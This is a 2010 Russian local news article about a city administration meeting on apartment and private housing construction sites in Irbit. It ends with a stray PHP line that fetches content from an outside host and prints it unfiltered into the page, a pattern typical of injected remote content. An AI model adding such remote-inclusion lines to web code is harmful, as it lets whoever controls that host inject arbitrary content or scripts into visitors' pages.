Регистрация нового пользоателя


Аллея Здоровья
Аллея Здоровья
Строительство жилья в Ирбите

2010-06-25 16:14:17
Строительство жилья в Ирбите

В четверг 10 июня в администрации города состоялось совещание по вопросам строительства жилья в Ирбите, на котором были рассмотрены как варианты строительства в городе многоквартирных домов, так и перспективы обустройства земельных участков под индивидуальное жилищное строительство. По оценкам специалистов, в настоящее время в городе осталось не так уж и много  площадок, пригодных для строительства многоквартирных домов. Наиболее подготовленными в настоящее время являются три из них. Во-первых, это объект по адресу Жукова, 7. Работы по возобновлению строительства на этой площадке городские власти начали пару лет назад. За это время здесь проведены все необходимые изыскания, получено подтверждение возможности подключения будущего дома к коммунальной инфраструктуре, подготовлен пакет проектно-сметной документации, который в ближайшие дни будет передан для повторного прохождения государственной экспертизы. Таким образом, уже через три месяца (срок прохождения госэкспертизы – 90 дней) у администрации города будет возможность начать работу по привлечению инвестора и проведению конкурса на определение компании-застройщика для строительства в Ирбите нового многоквартирника.


Второй наиболее вероятной площадкой для застройки является земельный участок на улице Стекольщиков. В настоящее время здесь идет процесс межевания земли, в результате чего к 15 июля будут сформированы земельные участки под строительство домов. По словам первого заместителя главы города Олега Мельникова, который вел совещание, в качестве наиболее вероятного варианта дальнейшего использования данной площадки рассматривается строительство так называемого, социального жилья. То есть домов, квартиры в которых предоставляются льготным категориям граждан.


Третья строительная площадка, на которой сегодня сосредоточено внимание городских властей – коробка дома, расположенная на улице Фрунзе. На одном из последних заседаний депутаты городской Думы согласились с доводами администрации города о необходимости исключения данного объекта незавершенного строительства из списка приватизируемого муниципального имущества. И сейчас специалисты МАУ «Служба заказчика-застройщика» готовятся к началу работ по проектированию строительства дома на основе имеющихся конструкций.


По словам директора «Службы заказчика-застройщика» Дмитрия Бушмакина, преимуществом данной площадки является наличие условий для подключения к сетям тепло-, водо- и электроснабжения. Следующий шаг в работе – проведение инженерных изысканий (исследование опорной конструкции, обследование здания и др.). Полученные данные лягут в основу проекта, к работе над которым при благоприятных условиях можно будет приступить уже в этом году.


Что касается перспектив дальнейшего строительства многоквартирных домов в нашем городе, то, как отметила гласный архитектор города Татьяна Артамонова, вариантов остается немного. Строительство таких домов еще можно планировать в микрорайоне Комсомольский и на улице Первомайской, напротив гостиницы «Ница», где уже много лет зарастает буйным кустарником свайная площадка.
Но особое внимание, по мнению Татьяны Лаврентьевны, в настоящее время необходимо обратить на проблемы индивидуального жилищного строительства. Сегодня администрация города оказалась в сложных условиях: большая часть земель, выделенных под частную застройку, освоена ирбитанами, а перспективных «направлений» развития территории города пока нет. Уже год специалисты отдела архитектуры и отдела муниципального имущества администрации города занимаются вопросом передачи под эти нужды неиспользуемых земель плодосовхоза. Но пока вопрос «завис» на уровне региональных министерств, которые не могут решить, как целесообразнее использовать данный участок: под застройку или для развития сельского хозяйства.


Более того, вопрос стоит и по оформлению уже существующих участков. Согласно действующему законодательству администрации муниципалитетов перед выделением земли должны не только провести межевание участка, но и обязаны обеспечить его доступом ко всем коммуникациям. По расчетам специалистов МУГИСО, затраты муниципалитетов на оформление каждого из таких участков могут превысить 200 тысяч рублей, что ложиться неоправданно большим грузом на местные бюджеты, особенно имеющие дотационный характер.


Тем не менее, закрывать глаза на проблемы ирбитчан, которые не могут сдать в эксплуатацию даже уже построенные дома из-за отсутствия элементарного энергоснабжения, администрация города не намерена. На совещании было принято решение: приступить к формированию в городе муниципальной целевой программы, в рамках которой предусмотреть все мероприятия по обеспечению необходимых условий для развития индивидуального жилищного строительства. Руководителям структурных подразделений администрации города, присутствующим на совещании, первый заместитель главы города Олег Мельников поручил подготовить свои предложения по мероприятиям программы, которые они обсудят уже на этой неделе.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>